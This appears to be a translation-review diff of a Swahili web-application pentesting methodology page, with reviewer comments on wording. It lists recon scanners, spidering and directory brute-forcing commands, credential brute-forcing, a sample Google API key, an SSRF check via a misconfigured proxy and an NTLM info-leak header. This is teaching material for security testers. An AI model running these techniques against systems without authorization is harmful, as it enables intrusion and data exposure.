- Je, kuna **interesting information in the github** (solved and not solved) **issues**? Au katika **commit history** (pengine kuna **password introduced inside an old commit**)?
- Je, kuna **interesting information in the github** (solved and not solved) **issues**? Au katika **commit history** (labda some **password introduced inside an old commit**)?
{{#ref}}
code-review-tools.md
{{#endref}}
### Skana za kiotomatiki
### Skana za moja kwa moja
#### Skana za kiotomatiki za matumizi ya jumla
#### Skana za otomatiki za matumizi ya jumla
```bash
nikto -h <URL>
whatweb -a 4 <URL>
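Review bot: "### Skana za moja kwa moja" is a mistranslation: "moja kwa moja" means "direct", while the heading is about automatic scanners, so the replaced "### Skana za kiotomatiki" was correct; "#### Skana za otomatiki" should likewise use the spelling used elsewhere on the page ("kiotomatiki"). The italic caution line also loses its trailing backslash ("subdomains._" instead of "subdomains._\"), so in rendered markdown it will run into the following sentence. In the source-review bullets, "labda some password introduced inside an old commit" mixes languages; "labda kuna password iliyowekwa kwenye commit ya zamani" keeps it Swahili.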
@ -134,9 +134,9 @@ nuclei -ut && nuclei -target <URL>
# https://github.com/ignis-sec/puff (client side vulns fuzzer)
node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi2rVUN/?query=FUZZ"
```
#### Skana za CMS
#### CMS scanners
Ikiwa CMS inatumiwa, usisahau **kufanya skana** — pengine unaweza kupata kitu cha kuvutia:
Ikiwa CMS inatumiwa usisahau **run a scanner**, labda utapata kitu cha kuvutia:
[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/index.html)**, Railo, Axis2, Glassfish**\
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/index.html), **Joomla**, **vBulletin** tovuti kwa masuala ya usalama. (GUI)\
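Review bot: "#### CMS scanners" replaces the Swahili "#### Skana za CMS", and the sentence after it mixes languages ("usisahau run a scanner"); keep the heading and wording of the replaced lines ("usisahau kufanya skana"). The CMSScan description in the context lines is missing its verb ("... vBulletin tovuti kwa masuala ya usalama. (GUI)"); "inakagua tovuti za ... kwa masuala ya usalama" would complete it.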
@ -149,11 +149,11 @@ wpscan --force update -e --url <URL>
joomscan --ec -u <URL>
joomlavs.rb #https://github.com/rastating/joomlavs
```
> Kwa hatua hii unapaswa tayari kuwa na baadhi ya taarifa za Web server zinazotumiwa na mteja (ikiwa data yoyote imetolewa) na mbinu kadhaa za kuzingatia wakati wa mtihani. Ikiwa una bahati uliweza hata kupata CMS na kuendesha scanner.
> Kwa hatua hii unapaswa tayari kuwa na baadhi ya taarifa kuhusu web server inayotumika na mteja (ikiwa data yoyote imetolewa) na baadhi ya mbinu za kuzingatia wakati wa mtihani. Ikiwa una bahati umepata hata CMS na kuendesha scanner.
## Step-by-step Web Application Discovery
> Kutoka hapa tutaanza kuingiliana na web application.
> Kuanzia hapa tutaanza kuingiliana na web application.
### Initial checks
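Review bot: The blockquote rewrite is fine, but the two headings in this hunk's context, "## Step-by-step Web Application Discovery" and "### Initial checks", stay in English while the lines between them are retranslated; if the page is meant to be fully Swahili, "## Ugunduzi wa Web Application Hatua kwa Hatua" and "### Ukaguzi wa awali" would bring them in line with the surrounding text.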
@ -164,30 +164,30 @@ joomlavs.rb #https://github.com/rastating/joomlavs
- /crossdomain.xml
- /clientaccesspolicy.xml
- /.well-known/
- Angalia pia maoni kwenye kurasa kuu na kurasa za pili.
- Check also comments in the main and secondary pages.
**Forcing errors**
Web servers zinaweza **kutenda kwa njia isiyotarajiwa** wakati data isiyo ya kawaida inapotumwa kwao. Hii inaweza kufungua **udhaifu** au kusababisha **kufichua taarifa nyeti**.
Web servers may **behave unexpectedly** when weird data is sent to them. This may open **vulnerabilities** or **disclosure sensitive information**.
- Fikia kurasa za **fake** kama /whatever_fake.php (.aspx,.html,.etc)
- **Ongeza "\[]", "]]", and "\[["** katika **cookie values** na **parameter** values ili kusababisha makosa
- Zalisha kosa kwa kutoa input kama **`/~randomthing/%s`** mwishoni mwa **URL**
- Jaribu **different HTTP Verbs** kama PATCH, DEBUG au mbaya kama FAKE
- Access **fake pages** like /whatever_fake.php (.aspx,.html,.etc)
- **Add "\[]", "]]", and "\[["** in **cookie values** and **parameter** values to create errors
- Generate error by giving input as **`/~randomthing/%s`** at the **end** of **URL**
- Try **different HTTP Verbs** like PATCH, DEBUG or wrong like FAKE
#### **Angalia kama unaweza kupakia files (**[**PUT verb, WebDav**](put-method-webdav.md)**)**
#### **Check if you can upload files (**[**PUT verb, WebDav**](put-method-webdav.md)**)**
Ikiwa utagundua kwamba **WebDav** imewezeshwa lakini huna ruhusa za kutosha za **uploading files** kwenye root folder jaribu:
If you find that **WebDav** is **enabled** but you don't have enough permissions for **uploading files** in the root folder try to:
- **Brute Force** credentials
- **Upload files** via WebDav kwenye **rest** ya **found folders** ndani ya web page. Huenda ukaweza kuwa na ruhusa za kupakia files katika folda nyingine.
- **Upload files** via WebDav to the **rest** of **found folders** inside the web page. You may have permissions to upload files in other folders.
### **SSL/TLS vulnerabilites**
- Ikiwa application **isn't forcing the user of HTTPS** sehemu yoyote, basi ni **vulnerable to MitM**
- Ikiwa application inatumia **HTTP** kutuma data nyeti (passwords). Hii ni vulnerability kubwa.
- If the application **isn't forcing the user of HTTPS** in any part, then it's **vulnerable to MitM**
- If the application is **sending sensitive data (passwords) using HTTP**. Then it's a high vulnerability.
Tumia [**testssl.sh**](https://github.com/drwetter/testssl.sh) kuangalia **vulnerabilities** (Katika Bug Bounty programs pengine aina hizi za vulnerabilities hazitakubaliwa) na tumia [**a2sv**](https://github.com/hahwul/a2sv) ili kukagua tena vulnerabilities:
Use [**testssl.sh**](https://github.com/drwetter/testssl.sh) to checks for **vulnerabilities** (In Bug Bounty programs probably these kind of vulnerabilities won't be accepted) and use [**a2sv** ](https://github.com/hahwul/a2sv)to recheck the vulnerabilities:
```bash
./testssl.sh [--htmlfile] 10.10.10.10:443
#Use the --htmlfile to save the output inside an htmlfile also
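Review bot: This hunk undoes a large part of the translation: every pair from "Angalia pia maoni kwenye kurasa kuu na kurasa za pili." through the testssl.sh sentence has the Swahili line replaced by its English original (the forcing-errors bullets, the WebDav upload paragraph and the SSL/TLS bullets), so the section ends up half Swahili, half English; keep the Swahili lines. Both versions of the MitM bullet share the same wording error, "isn't forcing the user of HTTPS", where the intended meaning is "the use of HTTPS", and the unchanged heading "### SSL/TLS vulnerabilites" is misspelled ("vulnerabilities"). The testssl.sh sentence also has "to checks for" in the English version; "to check for".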
@ -196,60 +196,60 @@ Tumia [**testssl.sh**](https://github.com/drwetter/testssl.sh) kuangalia **vulne
sslscan <host:port>
sslyze --regular <ip:port>
```
Information about SSL/TLS vulnerabilities:
Taarifa kuhusu udhaifu wa SSL/TLS:
- [https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/](https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/)
- [https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/](https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/)
### Spidering
Launch some kind of **spider** inside the web. Lengo la **spider** ni **kupata njia nyingi iwezekanavyo** kutoka kwenye application inayotestwa. Kwa hivyo, web crawling na vyanzo vya nje zinapaswa kutumika kupata njia halali nyingi iwezekanavyo.
Anzisha aina fulani ya **spider** ndani ya tovuti. Lengo la **spider** ni **kupata njia nyingi iwezekanavyo** kutoka kwa programu inayojaribiwa. Hivyo, web crawling na vyanzo vya nje vinapaswa kutumika ili kupata njia halali nyingi iwezekanavyo.
- [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder in JS files and external sources (Archive.org, CommonCrawl.org, VirusTotal.com).
- [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, with LinkFider for JS files and Archive.org as external source.
- [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spider, also indicates "juicy files".
- [**evine** ](https://github.com/saeeddhqan/evine)(go): Interactive CLI HTML spider. It also searches in Archive.org
- [**meg**](https://github.com/tomnomnom/meg) (go): This tool isn't a spider but it can be useful. Unaweza kutoa tu faili yenye hosts na faili yenye paths na meg itachukua kila path kwa kila host na kuhifadhi response.
- [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spider with JS rendering capabilities. However, it looks like it's unmaintained, the precompiled version is old and the current code doesn't compile
- [**gau**](https://github.com/lc/gau) (go): HTML spider that uses external providers (wayback, otx, commoncrawl)
- [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): This script will find URLs with parameter and will list them.
- [**galer**](https://github.com/dwisiswant0/galer) (go): HTML spider with JS rendering capabilities.
- [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML spider, with JS beautify capabilities capable of search new paths in JS files. It could be worth it also take a look to [JSScanner](https://github.com/dark-warlord14/JSScanner), which is a wrapper of LinkFinder.
- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): To extract endpoints in both HTML source and embedded javascript files. Useful for bug hunters, red teamers, infosec ninjas.
- [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests. Looks like unmaintained.
- [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): Given a file (HTML) it will extract URLs from it using nifty regular expression to find and extract the relative URLs from ugly (minify) files.
- [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, several tools): Gather interesting information from JS files using several tools.
- [**subjs**](https://github.com/lc/subjs) (go): Find JS files.
- [**page-fetch**](https://github.com/detectify/page-fetch) (go): Load a page in a headless browser and print out all the urls loaded to load the page.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Content discovery tool mixing several options of the previous tools
- [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): A Burp extension to find path and params in JS files.
- [**Sourcemapper**](https://github.com/denandz/sourcemapper): A tool that given the .js.map URL will get you the beatified JS code
- [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): This is a tool used to discover endpoints for a given target.
- [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Discover links from the wayback machine (also downloading the responses in the wayback and looking for more links
- [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (even by filling forms) and also find sensitive info using specific regexes.
- [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is an advance multi-feature GUI web security Crawler/Spider designed for cyber security professionals.
- [**jsluice**](https://github.com/BishopFox/jsluice) (go): It's a Go package and [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) for extracting URLs, paths, secrets, and other interesting data from JavaScript source code.
- [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge is a simple **Burp Suite extension** to **extract the paramters and endpoints** from the request to create custom wordlist for fuzzing and enumeration.
- [**katana**](https://github.com/projectdiscovery/katana) (go): Awesome tool for this.
- [**Crawley**](https://github.com/s0rg/crawley) (go): Print every link it's able to find.
- [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder katika JS files na vyanzo vya nje (Archive.org, CommonCrawl.org, VirusTotal.com).
- [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, with LinkFider for JS files na Archive.org kama chanzo cha nje.
- [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spider, pia inaonyesha "juicy files".
- [**evine** ](https://github.com/saeeddhqan/evine)(go): Interactive CLI HTML spider. Pia inatafuta kwenye Archive.org
- [**meg**](https://github.com/tomnomnom/meg) (go): Tool hii si spider lakini inaweza kuwa muhimu. Unaweza kubainisha faili yenye hosts na faili yenye paths na meg itachukua kila path kwenye kila host na kuhifadhi response.
- [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spider yenye uwezo wa JS rendering. Hata hivyo, inaonekana haitunzwi, version iliyotayarishwa kabla ni ya zamani na code ya sasa haitaundwa.
- [**gau**](https://github.com/lc/gau) (go): HTML spider ambayo inatumia providers za nje (wayback, otx, commoncrawl)
- [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): Script hii itapata URLs zenye parameter na kuziorodhesha.
- [**galer**](https://github.com/dwisiswant0/galer) (go): HTML spider yenye uwezo wa JS rendering.
- [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML spider, yenye JS beautify capabilities inayoweza kutafuta njia mpya katika JS files. Inaweza kufaa pia kuangalia [JSScanner](https://github.com/dark-warlord14/JSScanner), ambayo ni wrapper ya LinkFinder.
- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): Kutoka endpoints katika chanzo cha HTML na embedded javascript files. Inafaa kwa bug hunters, red teamers, infosec ninjas.
- [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): Script ya python 2.7 kutumia Tornado na JSBeautifier kuchanganua relative URLs kutoka JavaScript files. Inafaa kwa kufichua AJAX requests kwa urahisi. Inaonekana haitunzwi.
- [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): Ikipewa faili (HTML) itachukua URLs kutoka kwake kutumia regex nzuri kupata na kutoa relative URLs kutoka kwa faili zilizo minified.
- [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, several tools): Kusanya taarifa za kuvutia kutoka JS files kutumia zana mbalimbali.
- [**subjs**](https://github.com/lc/subjs) (go): Tafuta JS files.
- [**page-fetch**](https://github.com/detectify/page-fetch) (go): Pakia ukurasa katika headless browser na chapisha URLs zote zilizopewa ili kupakua ukurasa.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Tool ya discovery ya maudhui ikichanganya chaguo kadhaa za zana zilizotajwa hapo juu
- [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): Burp extension kutafuta path na params katika JS files.
- [**Sourcemapper**](https://github.com/denandz/sourcemapper): Tool ambayo ikibainisha .js.map URL itakuletea code ya JS iliyobebwa vizuri
- [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): Tool inayotumika kugundua endpoints kwa target iliyotolewa.
- [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Gunduzi links kutoka wayback machine (pia kupakua responses kwenye wayback na kutafuta links zaidi)
- [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (hata kwa kujaza forms) na pia pata info nyeti kwa kutumia regex maalum.
- [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite ni GUI ya kukuza web security Crawler/Spider iliyoendelea kwa wataalamu wa cybersecurity.
- [**jsluice**](https://github.com/BishopFox/jsluice) (go): Ni Go package na [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) kwa kuchukua URLs, paths, secrets, na data nyingine za kuvutia kutoka JavaScript source code.
- [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge ni extension rahisi ya **Burp Suite** ya **kuchukua paramters na endpoints** kutoka request ili kuunda wordlist ya custom kwa fuzzing na enumeration.
- [**katana**](https://github.com/projectdiscovery/katana) (go): Tool nzuri kwa hili.
- [**Crawley**](https://github.com/s0rg/crawley) (go): Chapisha kila link inayoweza kupatikana.
### Brute Force directories and files
Start **brute-forcing** from the root folder and be sure to brute-force **all** the **directories found** using **this method** and all the directories **discovered** by the **Spidering** (you can do this brute-forcing **recursively** and appending at the beginning of the used wordlist the names of the found directories).\
Tools:
Anza **brute-forcing** kutoka kwenye folda ya mizizi na hakikisha unafanya brute-force kwa **direktori zote zilizopatikana** kwa kutumia **mbinu hii** na direktori zote **zilizoonekana** wakati wa **Spidering** (unaweza kufanya brute-forcing hii **kimaendeleo** na kuongeza mwanzoni mwa wordlist inayotumika majina ya direktori zilizopatikana).\
Zana:
- **Dirb** / **Dirbuster** - Included in Kali, **old** (and **slow**) but functional. Allow auto-signed certificates and recursive search. Too slow compared with th other options.
- [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: It doesn't allow auto-signed certificates but** allows recursive search.
- [**Gobuster**](https://github.com/OJ/gobuster) (go): It allows auto-signed certificates, it **doesn't** have **recursive** search.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Fast, supports recursive search.**
- **Dirb** / **Dirbuster** - Imejumuishwa katika Kali, **zamani** (na **polepole**) lakini inafanya kazi. Inaruhusu auto-signed certificates na recursive search. Polepole sana ikilinganishwa na chaguo nyingine.
- [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: Haikaiwezi auto-signed certificates lakini** inaruhusu recursive search.
- [**Gobuster**](https://github.com/OJ/gobuster) (go): Inaruhusu auto-signed certificates, **haina** recursive search.
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Haraka, inaunga mkono recursive search.**
- [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`
- [**ffuf** ](https://github.com/ffuf/ffuf)- Fast: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
- [**uro**](https://github.com/s0md3v/uro) (python): This isn't a spider but a tool that given the list of found URLs will to delete "duplicated" URLs.
- [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Burp Extension to create a list of directories from the burp history of different pages
- [**TrashCompactor**](https://github.com/michael1026/trashcompactor): Remove URLs with duplicated functionalities (based on js imports)
- [**Chamaleon**](https://github.com/iustin24/chameleon): It uses wapalyzer to detect used technologies and select the wordlists to use.
- [**uro**](https://github.com/s0md3v/uro) (python): Hii si spider lakini ni tool ambayo ikipewa orodha ya URLs zilizopatikana itafuta kuondoa URLs "zilizo duplicated".
- [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Burp Extension ya kuunda orodha ya directories kutoka burp history ya kurasa mbalimbali
- [**TrashCompactor**](https://github.com/michael1026/trashcompactor): Ondoa URLs zenye functionalities za duplicated (kulingana na js imports)
- [**Chamaleon**](https://github.com/iustin24/chameleon): Inatumia wapalyzer kugundua teknolojia zinazotumika na kuchagua wordlists za kutumia.
**Recommended dictionaries:**
Recommended dictionaries:
- [https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/bf_directories.txt](https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/bf_directories.txt)
- [**Dirsearch** included dictionary](https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt)
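Review bot: the translated Dirsearch bullet contains a non-word: `Haikaiwezi auto-signed certificates lakini inaruhusu recursive search`; the English line it replaces says "It doesn't allow", so this should read `Hairuhusu auto-signed certificates lakini inaruhusu recursive search`. In the same list, the waymore bullet's `Gunduzi links` should be `Gundua links`, `kimaendeleo` in the brute-force paragraph does not convey "recursively" (`kwa kurudia`, or keep the English term, is clearer), and the Chamaleon bullet keeps the source typo `wapalyzer` for Wappalyzer while its link text `Chamaleon` does not match the repository name `chameleon` in the URL.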
@ -268,41 +268,41 @@ Tools:
- _/usr/share/wordlists/dirb/big.txt_
- _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
_Tafuta kwamba kila wakati directory mpya inapogunduliwa wakati wa brute-forcing au spidering, inapaswa kufanyiwa Brute-Force._
_Kumbuka kwamba kila wakati direktori mpya inapogunduliwa wakati wa brute-forcing au spidering, inapaswa kufanyiwa Brute-Forced._
### What to check on each file found
- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers
- **File Backups**: Once you have found all the files, look for backups of all the executable files ("_.php_", "_.aspx_"...). Common variations for naming a backup are: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ Unaweza pia kutumia tool [**bfac**](https://github.com/mazen160/bfac) **or** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **Discover new parameters**: You can use tools like [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **to discover hidden parameters. If you can, you could try to search** hidden parameters on each executable web file.
- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Tafuta broken links ndani ya HTML zinazoweza kuwa hatarini kwa takeover
- **File Backups**: Mara ukimaliza kupata faili zote, tazama backups za faili zote za executable ("_.php_", "_.aspx_"...). Mienendo ya kawaida ya kuitia jina backup ni: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ Unaweza pia kutumia tool [**bfac**](https://github.com/mazen160/bfac) **au** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **Discover new parameters**: Unaweza kutumia zana kama [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **na** [**Param Miner**](https://github.com/PortSwigger/param-miner) **kugundua parameters zilizofichika. Ikiwa inawezekana, unaweza kutafuta parameters zilizofichika kwenye kila faili ya executable ya wavuti.**
- _Arjun all default wordlists:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
- _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)
- _Assetnote “parameters_top_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io)
- _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)
- **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**.
- If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** (using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page.
- **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](<https://github.com/l4yton/RegHex)/>)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
- Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik you can use the project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) to check which apis the key can access.
- **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/index.html).
- **Comments:** Angalia comments za faili zote, unaweza kupata **credentials** au **hidden functionality**.
- Ikiwa unacheza **CTF**, hila ya kawaida ni **kuweka** **taarifa** ndani ya comments upande wa **kulia** wa ukurasa (kutumia mamia ya **spaces** ili usiioneshe data ukifungua source code kwa browser). Mwingine uwezekano ni kutumia **several new lines** na **kuficha taarifa** katika comment upande wa **chini** wa ukurasa wa wavuti.
- **API keys**: Ikiwa utapata API key yoyote kuna miongozo inayoonyesha jinsi ya kutumia API keys za platform tofauti: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](<https://github.com/l4yton/RegHex)/>)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
- Google API keys: Ikiwa utapata API key inayofanana na **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik unaweza kutumia project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) kuangalia ni APIs gani key inaweza kufikia.
- **S3 Buckets**: Wakati wa spidering angalia kama subdomain yoyote au link yoyote inahusiana na S3 bucket. Katika hicho kesi, [**angalia** ruhusa za bucket](buckets/index.html).
### Special findings
**While** performing the **spidering** and **brute-forcing** you could find **interesting** **things** that you have to **notice**.
**Wakati** unafanya **spidering** na **brute-forcing** unaweza kukutana na vitu **vya kuvutia** ambavyo unapaswa kuyazingatia.
**Interesting files**
- Look for **links** to other files inside the **CSS** files.
- Tafuta **links** za faili zingine ndani ya CSS files.
- [If you find a _**.git**_ file some information can be extracted](git.md)
- If you find a _**.env**_ information such as api keys, dbs passwords and other information can be found.
- If you find **API endpoints** you [should also test them](web-api-pentesting.md). These aren't files, but will probably "look like" them.
- **JS files**: In the spidering section several tools that can extract path from JS files were mentioned. Also, It would be interesting to **monitor each JS file found**, as in some ocations, a change may indicate that a potential vulnerability was introduced in the code. You could use for example [**JSMon**](https://github.com/robre/jsmon)**.**
- You should also check discovered JS files with [**RetireJS**](https://github.com/retirejs/retire.js/) or [**JSHole**](https://github.com/callforpapers-source/jshole) to find if it's vulnerable.
- Ikiwa utapata _**.env**_ taarifa kama api keys, passwords za db na taarifa nyingine zinaweza kupatikana.
- Ikiwa utapata **API endpoints** unapaswa [kujaribu pia](web-api-pentesting.md). Hizi si faili, lakini huenda "zinaonekana" kama faili.
- **JS files**: Katika sehemu ya spidering zimetajwa zana kadhaa zinazoweza kutoa paths kutoka kwa JS files. Pia, itakuwa nzuri **kufuata kila JS file** iliyoonekana, kwa kuwa mara nyingine mabadiliko yanaweza kuashiria kuwa udhaifu umeletwa kwenye code. Unaweza kutumia kwa mfano [**JSMon**](https://github.com/robre/jsmon)**.**
- Unapaswa pia kuangalia JS files zilizogunduliwa na [**RetireJS**](https://github.com/retirejs/retire.js/) au [**JSHole**](https://github.com/callforpapers-source/jshole) ili kuona kama zina udhaifu.
- **Javascript Deobfuscator and Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
- **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org)
- **JsFuck deobfuscation** (javascript with chars:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/))
- **TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
- On several occasions, you will need to **understand the regular expressions** used. This will be useful: [https://regex101.com/](https://regex101.com) or [https://pythonium.net/regex](https://pythonium.net/regex)
- You could also **monitor the files were forms were detected**, as a change in the parameter or the apearance f a new form may indicate a potential new vulnerable functionality.
- **TrainFuck**](https://github.com/taco-cy/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
- Katika matukio kadhaa, utahitaji **kuelewa regular expressions** zinazotumika. Hii itakuwa muhimu: [https://regex101.com/](https://regex101.com) au [https://pythonium.net/regex](https://pythonium.net/regex)
- Unaweza pia **kufuatilia faili zilizo detect kuwa na forms**, kwani mabadiliko ya parameter au kuonekana kwa form mpya kunaweza kuashiria functionality mpya yenye udhaifu.
**403 Forbidden/Basic Authentication/401 Unauthorized (bypass)**
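Review bot: the TrainFuck bullet changes the repository URL from `https://github.com/taco-c/trainfuck` to `https://github.com/taco-cy/trainfuck` inside a translation-only commit; verify which repository is correct rather than altering a link while translating. Both versions of that bullet also lack the opening `[` before `**TrainFuck**`, so the link does not render, and the RegHex link `[**RegHex**](<https://github.com/l4yton/RegHex)/>)` is malformed in both versions. The `.git` bullet and the three deobfuscator/beautifier bullets stay in English while the bullets around them are translated, and `kufanyiwa Brute-Forced` mixes an English past participle into the Swahili verb phrase; `kufanyiwa Brute-Force` reads correctly.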
@ -313,28 +313,28 @@ _Tafuta kwamba kila wakati directory mpya inapogunduliwa wakati wa brute-forcing
**502 Proxy Error**
If any page **responds** with that **code**, it's probably a **bad configured proxy**. **If you send a HTTP request like: `GET https://google.com HTTP/1.1`** (with the host header and other common headers), the **proxy** will try to **access** _**google.com**_ **and you will have found a** SSRF.
Ikiwa ukurasa wowote unajibu na code hiyo, ina maana kuna proxy iliyopangwa vibaya. **Ikiwa utatuma HTTP request kama: `GET https://google.com HTTP/1.1`** (na host header na headers nyingine za kawaida), proxy itajaribu kufikia _**google.com**_ na utakuwa umepata SSRF.
**NTLM Authentication - Info disclosure**
If the running server asking for authentication is **Windows** or you find a login asking for your **credentials** (and asking for **domain** **name**), you can provoke an **information disclosure**.\
**Send** the **header**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` and due to how the **NTLM authentication works**, the server will respond with internal info (IIS version, Windows version...) inside the header "WWW-Authenticate".\
You can **automate** this using the **nmap plugin** "_http-ntlm-info.nse_".
Ikiwa server inayotumia inauliza authentication ni **Windows** au ukapata login inayoomba **credentials** zako (na kuomba **domain** **name**), unaweza kusababisha disclosure ya taarifa.\
**Tuma** header: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` na kutokana na jinsi **NTLM authentication** inavyofanya kazi, server itajibu na info za ndani (toleo la IIS, toleo la Windows...) ndani ya header "WWW-Authenticate".\
Unaweza **kuweka mchakato wa automati** kwa kutumia nmap plugin "_http-ntlm-info.nse_".
**HTTP Redirect (CTF)**
It is possible to **put content** inside a **Redirection**. This content **won't be shown to the user** (as the browser will execute the redirection) but something could be **hidden** in there.
Inawezekana **kuweka maudhui** ndani ya **Redirection**. Maudhui haya **hayataonyeshwa kwa mtumiaji** (kwa kuwa browser itatekeleza redirect) lakini kitu kinaweza **kufichwa** ndani yake.
### Web Vulnerabilities Checking
